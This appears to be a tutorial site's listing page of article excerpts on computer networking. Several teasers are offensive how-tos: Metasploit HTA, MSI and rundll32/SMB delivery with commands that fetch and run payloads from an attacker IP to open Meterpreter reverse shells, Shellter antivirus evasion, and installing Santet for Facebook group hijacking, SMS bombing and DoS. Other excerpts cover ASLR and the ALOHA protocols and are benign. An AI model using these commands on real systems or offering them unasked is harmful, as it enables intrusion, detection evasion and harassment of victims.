Found 1625 Articles for Computer Network

TheZoo Repository Live Malware Analysis

Ajay yadav
Updated on 23-Sep-2020 12:33:30

953 Views

theZoo allows the study of malware and enables people who are interested in malware analysis to have access to live malware, analyse the ways they operate, and maybe even enable advanced and savvy people to block specific malware within their own environment.

    git clone https://github.com/ytisf/theZoo
    cd theZoo
    pip install --user -r requirements.txt
    python theZoo.py

I recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with ... Read More

Hacking with HTA file (MSHTA.exe)

Ajay yadav
Updated on 23-Sep-2020 12:31:54

1K+ Views

HTA (HTML Application) files, which can be written with JavaScript or VBScript, are run by a Windows OS utility. You can interpret these files using the Microsoft MSHTA.exe tool.

Metasploit contains the “HTA Web Server” module, which generates a malicious HTA file. This module hosts an HTML Application (HTA) that when opened will run a payload via PowerShell.

Malicious HTA file

Open Metasploit in Kali Linux and run the following commands to generate a malicious HTA file:

    use exploit/windows/misc/hta_server
    set srvhost 192.168.1.109
    set lhost 192.168.1.109
    exploit

Now run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.

Read More

Hacking with Santet

Ajay yadav
Updated on 23-Sep-2020 12:30:05

795 Views

This article explains how to use the Santet tool, which has several different attacks built into one package. It allows you to create a payload, hijack a Facebook group, perform SMS bomber and SMS spoof attacks, and finally a denial-of-service attack. Follow the instructions below to learn how to install Santet and use it.

Turn on your Kali machine, open a terminal and type in

    git clone https://github.com/Gameye98/santet-online

Now change your current directory to santet-online using the cd command −

    cd santet-online

Now give execute permission to the santet.py file by executing this command −

    chmod +x santet.py

Now run python santet.py as follows:

If everything ... Read More

Get the Reverse Shell with MSI package

Ajay yadav
Updated on 23-Sep-2020 12:27:26

1K+ Views

Windows OS comes installed with a Windows Installer engine, which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.

Launch msiexec attack via msfvenom

Let’s generate an MSI package file (1.msi) utilizing the Windows Meterpreter payload as follows:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

At the target end, the victim executes the 1.msi file on the remote machine with the following utility:

    msiexec /q /i http://192.168.1.109/1.msi

The attacker gets the reverse shell of the victim machine by starting multi/handler as the listener.

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.109
    exploit

Read More

Bypass Antivirus with Shellter

Ajay yadav
Updated on 23-Sep-2020 12:25:51

857 Views

Shellter is an active shellcode insertion tool. It effectively re-encodes payloads to bypass anti-virus software. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.

Installation

You can install Shellter directly on Kali by using the following commands −

    apt-get install shellter
    apt-get install wine32

How to Bypass

Open Shellter using the wine app and select the operation mode as 'a'. Choose an executable file and copy it to the Shellter folder. This is required to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder ... Read More

Rundll32.exe Attack

Ajay yadav
Updated on 23-Sep-2020 12:23:33

495 Views

Rundll32.exe is a Windows operating system component that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit, and store it in proper memory libraries.

Launch Rundll32 Attack via SMB

Metasploit contains the “SMB Delivery” module, which generates a malicious DLL file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.

Generate DLL payload

    use exploit/windows/smb/smb_delivery
    msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109    (attacker IP)
    msf exploit(windows/smb/smb_delivery) > exploit

Now execute this generated malicious DLL file on the victim machine with the help of rundll32.exe, and you will get the reverse connection at your machine.

    rundll32.exe \\192.168.1.109\vabFG\test.dll, 0

Read More

Address Space Layout Randomization (ASLR)

Ajay yadav
Updated on 23-Sep-2020 12:21:13

218 Views

Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them. This article presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.

Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash ... Read More

Slotted ALOHA

Moumita
Updated on 23-Sep-2020 09:07:16

16K+ Views

ALOHA is a medium access control (MAC) protocol for transmission of data via a shared network channel. Using this protocol, several data streams originating from multiple nodes are transferred through a multi-point transmission channel. There are two types of ALOHA protocols – Pure ALOHA and Slotted ALOHA.

Slotted ALOHA was introduced in 1972 by Robert as an improvement over pure ALOHA. Here, time is divided into discrete intervals called slots, corresponding to a frame.

Working Principle

The communicating stations agree upon the slot boundaries. Any station can send only one frame at each slot. Also, the stations cannot transmit at any time whenever a ... Read More

Pure ALOHA

Moumita
Updated on 23-Sep-2020 08:54:13

18K+ Views

ALOHA is a medium access control (MAC) protocol for transmission of data via a shared network channel. Using this protocol, several data streams originating from multiple nodes are transferred through a multi-point transmission channel. There are two types of ALOHA protocols – Pure ALOHA and Slotted ALOHA.

In pure ALOHA, the time of transmission is continuous. Whenever a station has an available frame, it sends the frame. If there is collision and the frame is destroyed, the sender waits for a random amount of time before retransmitting it.

Working Principle

After transmitting a frame, a station waits for a finite period of time ... Read More

ALOHA Protocol in computer network

Moumita
Updated on 02-Sep-2023 10:08:55

80K+ Views

ALOHA is a multiple access protocol for transmission of data via a shared network channel. It operates in the medium access control sublayer (MAC sublayer) of the open systems interconnection (OSI) model. Using this protocol, several data streams originating from multiple nodes are transferred through a multi-point transmission channel.

In ALOHA, each node or station transmits a frame without trying to detect whether the transmission channel is idle or busy. If the channel is idle, then the frames will be successfully transmitted. If two frames attempt to occupy the channel simultaneously, collision of frames will occur and the frames will be ... Read More
